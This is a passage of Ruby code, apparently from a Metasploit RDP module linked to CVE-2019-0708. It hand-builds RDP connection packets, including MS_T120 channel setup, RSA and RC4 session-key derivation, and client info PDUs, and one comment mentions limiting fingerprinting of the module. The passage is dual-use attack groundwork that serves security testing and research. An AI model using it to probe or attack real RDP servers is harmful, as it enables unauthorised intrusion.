rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
vprint_error("Connection error: #{e.message}")
return(false)
end
return(true)
end
def rsa_encrypt(bignum, rsexp, rsmod)
return((bignum ** rsexp) % rsmod)
end
# ------------------------------------------------------------------------- #
## Used to abruptly abort scanner for a given host.
class RdpCommunicationError < StandardError
end
## Define standard RDP constants.
class RDPConstants
PROTOCOL_RDP = 0
end
DEFAULT_CHANNELS_DEFS =
"\x04\x00\x00\x00" + # channelCount: 4
## Channels definitions consist of a name (8 bytes) and options flags
## (4 bytes). Names are up to 7 ANSI characters with null termination.
"\x72\x64\x70\x73\x6e\x64\x00\x00" + # rdpsnd
"\x0f\x00\x00\xc0" +
"\x63\x6c\x69\x70\x72\x64\x72\x00" + # cliprdr
"\x00\x00\xa0\xc0" +
"\x64\x72\x64\x79\x6e\x76\x63" + # drdynvc
"\x00\x00\x00\x80\xc0" +
"\x4d\x53\x5f\x54\x31\x32\x30" + # MS_T120
"\x00\x00\x00\x00\x00"
## Builds x.224 Data (DT) TPDU - Section 13.7
def rdp_build_data_tpdu(data)
tpkt_length = data.length + 7
"\x03\x00" + # TPKT Header version 03, reserved 0
[tpkt_length].pack("S>") + # TPKT length
"\x02\xf0" + # X.224 Data TPDU (2 bytes)
"\x80" + # X.224 End Of Transmission (0x80)
data
end
## Build the X.224 packet, encrypt with Standard RDP Security as needed.
## Default channel_id = 0x03eb = 1003.
def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = "\x03\xeb", client_info = false, rdp_sec = true)
flags = 0
flags |= 0b1000 if(rdp_sec) # Set SEC_ENCRYPT
flags |= 0b1000000 if(client_info) # Set SEC_INFO_PKT
pdu = ""
## TS_SECURITY_HEADER - 2.2.8.1.1.2.1
## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs.
if(client_info || rdp_sec)
pdu << [flags].pack("S<") # flags "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT
pdu << "\x00\x00" # flagsHi
end
if(rdp_sec)
## Encrypt the payload with RDP Standard Encryption.
pdu << rdp_hmac(hmackey, data)[0..7]
pdu << rdp_rc4_crypt(rc4enckey, data)
else
pdu << data
end
user_data_len = pdu.length
udl_with_flag = 0x8000 | user_data_len
pkt = "\x64" # sendDataRequest
pkt << "\x00\x08" # initiator userId (TODO: for a functional client this isn't static)
pkt << channel_id # channelId
pkt << "\x70" # dataPriority
pkt << [udl_with_flag].pack("S>")
pkt << pdu
return(rdp_build_data_tpdu(pkt))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471
## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1
def rdp_build_share_control_header(type, data, channel_id = "\xf1\x03")
total_len = data.length + 6
return(
[total_len].pack("S<") + # totalLength - includes all headers
[type].pack("S<") + # pduType - flags 16 bit, unsigned
channel_id + # PDUSource: 0x03f1 = 1009
data
)
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31
## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2
def rdp_build_share_data_header(type, data)
uncompressed_len = data.length + 4
return(
"\xea\x03\x01\x00" + # shareId: 66538
"\x00" + # pad1
"\x01" + # streamID: 1
[uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int
[type].pack("C") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2
"\x00" + # compressedType: 0
"\x00\x00" + # compressedLength: 0
data
)
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b
## Virtual Channel PDU 2.2.6.1
def rdp_build_virtual_channel_pdu(flags, data)
data_len = data.length
return(
[data_len].pack("L<") + # length
[flags].pack("L<") + # flags
data
)
end
def rdp_calculate_rc4_keys(client_random, server_random)
## preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom).
preMasterSecret = client_random[0..23] + server_random[0..23]
## PreMasterHash(I) = SaltedHash(preMasterSecret, I)
## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343).
masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) + rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) + rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random)
## MasterHash(I) = SaltedHash(MasterSecret, I)
## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A).
sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) + rdp_salted_hash(masterSecret, "YY", client_random, server_random) + rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random)
## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)).
initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)
## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)).
initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)
macKey = sessionKeyBlob[0..15]
return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob
end
def rdp_connection_initiation()
## Code to check if RDP is open or not.
vprint_status("Verifying RDP protocol...")
vprint_status("Attempting to connect using RDP security")
rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP))
received = sock.get_once(-1, 5)
## TODO: fix it.
if (received and received.include? "\x00\x12\x34\x00")
return(true)
end
return(false)
end
## FinalHash(K) = MD5(K + ClientRandom + ServerRandom).
def rdp_final_hash(k, client_random_bytes, server_random_bytes)
md5 = Digest::MD5.new
md5 << k
md5 << client_random_bytes
md5 << server_random_bytes
return([md5.hexdigest].pack("H*"))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94
## mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d"
## data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00"
## hmac = rdp_hmac(mac_salt_key, data_content) # hexlified: "22d5aeb486994a0c785dc929a2855923".
def rdp_hmac(mac_salt_key, data_content)
sha1 = Digest::SHA1.new
md5 = Digest::MD5.new
pad1 = "\x36" * 40
pad2 = "\x5c" * 48
sha1 << mac_salt_key
sha1 << pad1
sha1 << [data_content.length].pack('<L')
sha1 << data_content
md5 << mac_salt_key
md5 << pad2
md5 << [sha1.hexdigest].pack("H*")
return([md5.hexdigest].pack("H*"))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c
## Parse Server MCS Connect Response PDU - 2.2.1.4
def rdp_parse_connect_response(pkt)
ptr = 0
rdp_pkt = pkt[0x49..pkt.length]
while(ptr < rdp_pkt.length)
header_type = rdp_pkt[ptr..ptr + 1]
header_length = rdp_pkt[ptr + 2..ptr + 3].unpack("S<")[0]
# vprint_status("header: #{bin_to_hex(header_type)}, len: #{header_length}")
if(header_type == "\x02\x0c")
# vprint_status("Security header")
server_random = rdp_pkt[ptr + 20..ptr + 51]
public_exponent = rdp_pkt[ptr + 84..ptr + 87]
modulus = rdp_pkt[ptr + 88..ptr + 151]
# vprint_status("modulus_old: #{bin_to_hex(modulus)}")
rsa_magic = rdp_pkt[ptr + 68..ptr + 71]
if(rsa_magic != "RSA1")
print_error("Server cert isn't RSA, this scenario isn't supported (yet).")
raise RdpCommunicationError
end
# vprint_status("RSA magic: #{rsa_magic}")
bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack("L<")[0] - 8
vprint_status("RSA #{bitlen}-bits")
modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen]
# vprint_status("modulus_new: #{bin_to_hex(modulus)}")
end
ptr += header_length
end
# vprint_status("SERVER_MODULUS: #{bin_to_hex(modulus)}")
# vprint_status("SERVER_EXPONENT: #{bin_to_hex(public_exponent)}")
# vprint_status("SERVER_RANDOM: #{bin_to_hex(server_random)}")
rsmod = bytes_to_bignum(modulus)
rsexp = bytes_to_bignum(public_exponent)
rsran = bytes_to_bignum(server_random)
vprint_status("MODULUS: #{bin_to_hex(modulus)} - #{rsmod.to_s}")
vprint_status("EXPONENT: #{bin_to_hex(public_exponent)} - #{rsexp.to_s}")
vprint_status("SVRANDOM: #{bin_to_hex(server_random)} - #{rsran.to_s}")
return rsmod, rsexp, rsran, server_random, bitlen
end
def rdp_rc4_crypt(rc4obj, data)
rc4obj.encrypt(data)
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f
## SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom))
def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes)
sha1 = Digest::SHA1.new
md5 = Digest::MD5.new
sha1 << i_bytes
sha1 << s_bytes
sha1 << client_random_bytes
sha1 << server_random_bytes
md5 << s_bytes
md5 << [sha1.hexdigest].pack("H*")
return([md5.hexdigest].pack("H*"))
end
def rdp_recv()
buffer_1 = sock.get_once(4, 5)
raise RdpCommunicationError unless buffer_1 # nil due to a timeout
buffer_2 = sock.get_once(buffer_1[2..4].unpack("S>")[0], 5)
raise RdpCommunicationError unless buffer_2 # nil due to a timeout
vprint_status("Received data: #{bin_to_hex(buffer_1 + buffer_2)}")
return(buffer_1 + buffer_2)
end
def rdp_send(data)
vprint_status("Send data: #{bin_to_hex(data)}")
sock.put(data)
end
def rdp_sendrecv(data)
rdp_send(data)
return(rdp_recv())
end
# ------------------------------------------------------------------------- #
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10
## Client X.224 Connect Request PDU - 2.2.1.1
def pdu_negotiation_request(user_name = "", requested_protocols = RDPConstants::PROTOCOL_RDP)
## Blank username is valid, nil is random.
user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?)
tpkt_len = user_name.length + 38
x224_len = user_name.length + 33
return(
"\x03\x00" + # TPKT Header version 03, reserved 0
[tpkt_len].pack("S>") + # TPKT length: 43
[x224_len].pack("C") + # X.224 LengthIndicator
"\xe0" + # X.224 Type: Connect Request
"\x00\x00" + # dst reference
"\x00\x00" + # src reference
"\x00" + # class and options
"\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" + # cookie - literal 'Cookie: mstshash='
user_name + # Identifier "username"
"\x0d\x0a" + # cookie terminator
"\x01\x00" + # Type: RDP Negotiation Request (0x01)
"\x08\x00" + # Length
[requested_protocols].pack('L<') # requestedProtocols
)
end
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = "rdesktop", channels_defs = DEFAULT_CHANNELS_DEFS)
## After negotiating TLS or NLA the connectInitial packet needs to include the
## protocol selection that the server indicated in its negotiation response.
## TODO: If this is pulled into an RDP library then the channel list likely
## needs to be built dynamically. For example, MS_T120 likely should only
## ever be sent as part of checks for CVE-2019-0708.
## build clientName - 2.2.1.3.2 Client Core Data (TS_UD_CS_CORE)
## 15 characters + null terminator, converted to unicode
## fixed length - 32 characters total
name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le')
name_unicode += "\x00" * (32 - name_unicode.length)
pdu = "\x7f\x65" + # T.125 Connect-Initial (BER: Application 101)
"\x82\x01\xb2" + # Length (BER: Length)
"\x04\x01\x01" + # CallingDomainSelector: 1 (BER: OctetString)
"\x04\x01\x01" + # CalledDomainSelector: 1 (BER: OctetString)
"\x01\x01\xff" + # UpwardFlag: True (BER: boolean)
## Connect-Initial: Target Parameters
"\x30\x19" + # TargetParameters (BER: SequenceOf)
## *** not sure why the BER encoded Integers below have 2 byte values instead of one ***
"\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
## Connect-Initial: Minimum Parameters
"\x30\x19" + # MinimumParameters (BER: SequenceOf)
"\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02" +
## Connect-Initial: Maximum Parameters
"\x30\x1c" + # MaximumParameters (BER: SequenceOf)
"\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
## Connect-Initial: UserData
"\x04\x82\x01\x51" + # UserData, length 337 (BER: OctetString)
## T.124 GCC Connection Data (ConnectData) - PER Encoding used
"\x00\x05" + # object length
"\x00\x14\x7c\x00\x01" + # object: OID 0.0.20.124.0.1 = Generic Conference Control
"\x81\x48" + # Length: ??? (Connect PDU)
"\x00\x08\x00\x10\x00\x01\xc0\x00" + # T.124 Connect PDU, Conference name 1
"\x44\x75\x63\x61" + # h221NonStandard: 'Duca' (client-to-server H.221 key)
"\x81\x3a" + # Length: ??? (T.124 UserData section)
## Client MCS Section - 2.2.1.3
"\x01\xc0" + # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2
"\xea\x00" + # Length: 234 (includes header)
"\x0a\x00\x08\x00" + # version: 8.1 (RDP 5.0 -> 8.1)
"\x80\x07" + # desktopWidth: 1920
"\x38\x04" + # desktopHeight: 1080
"\x01\xca" + # colorDepth: 8 bpp
"\x03\xaa" + # SASSequence: 43523
"\x09\x04\x00\x00" + # keyboardLayout: 1033 (English US)
"\xee\x42\x00\x00" + # clientBuild: ????
[name_unicode].pack("a*") + # clientName
"\x04\x00\x00\x00" + # keyboardType: 4 (IBMEnhanced 101 or 102)
"\x00\x00\x00\x00" + # keyboardSubType: 0
"\x0c\x00\x00\x00" + # keyboardFunctionKey: 12
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # imeFileName (64 bytes)
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x01\xca" + # postBeta2ColorDepth: 8 bpp
"\x01\x00" + # clientProductID: 1
"\x00\x00\x00\x00" + # serialNumber: 0
"\x18\x00" + # highColorDepth: 24 bpp
"\x0f\x00" + # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp)
"\xaf\x07" + # earlyCapabilityFlags
"\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00" + # clientDigProductID (64 bytes)
"\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00" +
"\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d" +
"\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42" +
"\x07" + # connectionType: 7
"\x00" + # pad1octet
## serverSelectedProtocol - After negotiating TLS or CredSSP this value
## must match the selectedProtocol value from the server's Negotiate
## Connection confirm PDU that was sent before encryption was started.
[selected_proto].pack('L<') + # "\x01\x00\x00\x00"
"\x56\x02\x00\x00" +
"\x50\x01\x00\x00" +
"\x00\x00" +
"\x64\x00\x00\x00" +
"\x64\x00\x00\x00" +
"\x04\xc0" + # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5
"\x0c\x00" + # Length: 12 (includes header)
"\x15\x00\x00\x00" + # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3)
"\x00\x00\x00\x00" + # RedirectedSessionID
"\x02\xc0" + # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3
"\x0c\x00" + # Length: 12 (includes header)
"\x1b\x00\x00\x00" + # encryptionMethods: 0x1b (40 bit | 128 bit | 56 bit | FIPS)
"\x00\x00\x00\x00" + # extEncryptionMethods (French locale only)
"\x03\xc0" + # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4
"\x38\x00" + # Length: 56 (includes header)
channels_defs
## Fix. for packet modification.
## T.125 Connect-Initial
size_1 = [pdu.length - 5].pack("s") # Length (BER: Length)
pdu[3] = size_1[1]
pdu[4] = size_1[0]
## Connect-Initial: UserData
size_2 = [pdu.length - 102].pack("s") # UserData, length (BER: OctetString)
pdu[100] = size_2[1]
pdu[101] = size_2[0]
## T.124 GCC Connection Data (ConnectData) - PER Encoding used
size_3 = [pdu.length - 111].pack("s") # Length (Connect PDU)
pdu[109] = "\x81"
pdu[110] = size_3[0]
size_4 = [pdu.length - 125].pack("s") # Length (T.124 UserData section)
pdu[123] = "\x81"
pdu[124] = size_4[0]
## Client MCS Section - 2.2.1.3
size_5 = [pdu.length - 383].pack("s") # Length (includes header)
pdu[385] = size_5[0]
rdp_build_data_tpdu(pdu)
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
## Client Security Exchange PDU - 2.2.1.10
def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)
encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)
bitlen += 8 # Pad with size of TS_SECURITY_PACKET header
userdata_length = 8 + bitlen
userdata_length_low = userdata_length & 0xFF
userdata_length_high = userdata_length / 256
flags = 0x80 | userdata_length_high
pdu = "\x64" + # T.125 sendDataRequest
"\x00\x08" + # initiator userId
"\x03\xeb" + # channelId = 1003
"\x70" + # dataPriority = high, segmentation = begin | end
[flags].pack("C") +
[userdata_length_low].pack("C") + # UserData length
# TS_SECURITY_PACKET - 2.2.1.10.1
"\x01\x00" + # securityHeader flags
"\x00\x00" + # securityHeader flagsHi
[bitlen].pack("L<") + # TS_ length
encrypted_rcran + # encryptedClientRandom - 64 bytes
"\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present)
return(rdp_build_data_tpdu(pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
## Client MCS Erect Domain Request PDU - 2.2.1.5
def pdu_erect_domain_request()
pdu = "\x04" + # T.125 ErectDomainRequest
"\x01\x00" + # subHeight - length 1, value 0
"\x01\x00" # subInterval - length 1, value 0
return(rdp_build_data_tpdu(pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247
## Client MCS Attach User Request PDU - 2.2.1.6
def pdu_attach_user_request()
pdu = "\x28" # T.125 AttachUserRequest
return(rdp_build_data_tpdu(pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b
## Client MCS Channel Join Request PDU - 2.2.1.8
def pdu_channel_request(user1, channel_id)
pdu = "\x38" + [user1, channel_id].pack("nn") # T.125 ChannelJoinRequest
return(rdp_build_data_tpdu(pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
## TS_INFO_PACKET - 2.2.1.11.1.1
def pdu_client_info(user_name, domain_name = "", ip_address = "")
## Max. len for 4.0/6.0 servers is 44 bytes including terminator.
## Max. len for all other versions is 512 including terminator.
## We're going to limit to 44 (21 chars + null -> unicode) here.
## Blank username is valid, nil = random.
user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?
user_unicode = Rex::Text.to_unicode(user_name[0..20], type = 'utf-16le')
uname_len = user_unicode.length
## Domain can be, and for rdesktop typically is, empty.
## Max. len for 4.0/5.0 servers is 52 including terminator.
## Max. len for all other versions is 512 including terminator.
## We're going to limit to 52 (25 chars + null -> unicode) here.
domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le')
domain_len = domain_unicode.length
## This address value is primarily used to reduce the fields by which this
## module can be fingerprinted. It doesn't show up in Windows logs.
## clientAddress + null terminator
ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + "\x00\x00"
ip_len = ip_unicode.length
pdu = "\xa1\xa5\x09\x04" +
"\x09\x04\xbb\x47" + # CodePage
"\x03\x00\x00\x00" + # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY
[domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator
[uname_len].pack("S<") + # cbUserName (length value) - EXCLUDES null terminator
"\x00\x00" + # cbPassword (length value)
"\x00\x00" + # cbAlternateShell (length value)
"\x00\x00" + # cbWorkingDir (length value)
[domain_unicode].pack("a*") + # Domain
"\x00\x00" + # Domain null terminator, EXCLUDED from value of cbDomain
[user_unicode].pack("a*") + # UserName
"\x00\x00" + # UserName null terminator, EXCLUDED FROM value of cbUserName
"\x00\x00" + # Password - empty
"\x00\x00" + # AlternateShell - empty
## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1
"\x02\x00" + # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically
[ip_len].pack("S<") + # cbClientAddress (length value) - INCLUDES terminator ... for reasons.
[ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode)
"\x3c\x00" + # cbClientDir (length value): 60
"\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00\x54\x00" + # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator
"\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00" +
"\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00" +
"\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" +
## clientTimeZone - TS_TIME_ZONE struct - 172 bytes
## These are the default values for rdesktop
"\xa4\x01\x00\x00" + # Bias
## StandardName - 'Mountain Standard Time'
"\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
"\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00" +
"\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # StandardDate
"\x00\x00\x00\x00" + # StandardBias
## DaylightName - 'Mountain Daylight Time'
"\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
"\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00" +
"\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate
"\xc4\xff\xff\xff" + # DaylightBias
"\x01\x00\x00\x00" + # clientSessionId
"\x06\x00\x00\x00" + # performanceFlags
"\x00\x00" + # cbAutoReconnectCookie
"\x64\x00\x00\x00"
return(pdu)
end
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48
# Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1
def pdu_client_confirm_active()
pdu = "\xea\x03\x01\x00" + # shareId: 66538
"\xea\x03" + # originatorId
"\x06\x00" + # lengthSourceDescriptor: 6
"\x3e\x02" + # lengthCombinedCapabilities: ???
"\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC'
"\x17\x00" + # numberCapabilities: 23
"\x00\x00" + # pad2Octets
"\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET
"\x18\x00" + # lengthCapability: 24
"\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET
"\x1c\x00" + # lengthCapability: 28
"\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00" +
"\x01\x00\x00\x1a\x01\x00\x00\x00" +
"\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET
"\x58\x00" + # lengthCapability: 88
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00" +
"\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01" +
"\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00" +
"\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" +
"\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00" +
"\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x0a\x00" + # capabilitySetType: 10 - ??
"\x08\x00" + # lengthCapability: 8
"\x06\x00\x00\x00" +
"\x07\x00" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET
"\x0c\x00" + # lengthCapability: 12
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET
"\x0c\x00" + # lengthCapability: 12
"\x00\x00\x00\x00\x02\x00\x02\x00" +
"\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET
"\x0a\x00" + # lengthCapability: 10
"\x01\x00\x14\x00\x15\x00" +
"\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET
"\x08\x00" + # lengthCapability: 8
"\x00\x00\x00\x00" +
"\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET
"\x58\x00" + # lengthCapability: 88
"\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" +
"\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET
"\x08\x00" + # lengthCapability: 8
"\x01\x00\x00\x00" +
"\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET
"\x08\x00" + # lengthCapability: 8
"\x01\x00\x00\x00" +
"\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET
"\x34\x00" + # lengthCapability: 52
"\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" +
"\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" +
"\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00" +
"\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET
"\x08\x00" + # lengthCapability: 8
"\x01\x00\x00\x00" +
"\x11\x00" + # capabilitySetType: ??
"\x0c\x00" + # lengthCapability: 12
"\x01\x00\x00\x00\x00\x28\x64\x00" +
"\x14\x00" + # capabilitySetType: ??
"\x0c\x00" + # lengthCapability: 12
"\x01\x00\x00\x00\x00\x00\x00\x00" +
"\x15\x00" + # capabilitySetType: ??
"\x0c\x00" + # lengthCapability: 12
"\x02\x00\x00\x00\x00\x0a\x00\x01" +
"\x1a\x00" + # capabilitySetType: ??
"\x08\x00" + # lengthCapability: 8
"\xaf\x94\x00\x00" +
"\x1c\x00" + # capabilitySetType: ??
"\x0c\x00" + # lengthCapability: 12
"\x12\x00\x00\x00\x00\x00\x00\x00" +
"\x1b\x00" + # capabilitySetType: ??
"\x06\x00" + # lengthCapability: 6
"\x01\x00" +
"\x1e\x00" + # capabilitySetType: ??
"\x08\x00" + # lengthCapability: 8
"\x01\x00\x00\x00" +
"\x18\x00" + # capabilitySetType: ??
"\x0b\x00" + # lengthCapability: 11
"\x02\x00\x00\x00\x03\x0c\x00" +
"\x1d\x00" + # capabilitySetType: ??
"\x5f\x00" + # lengthCapability: 95
"\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2" +
"\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80" +
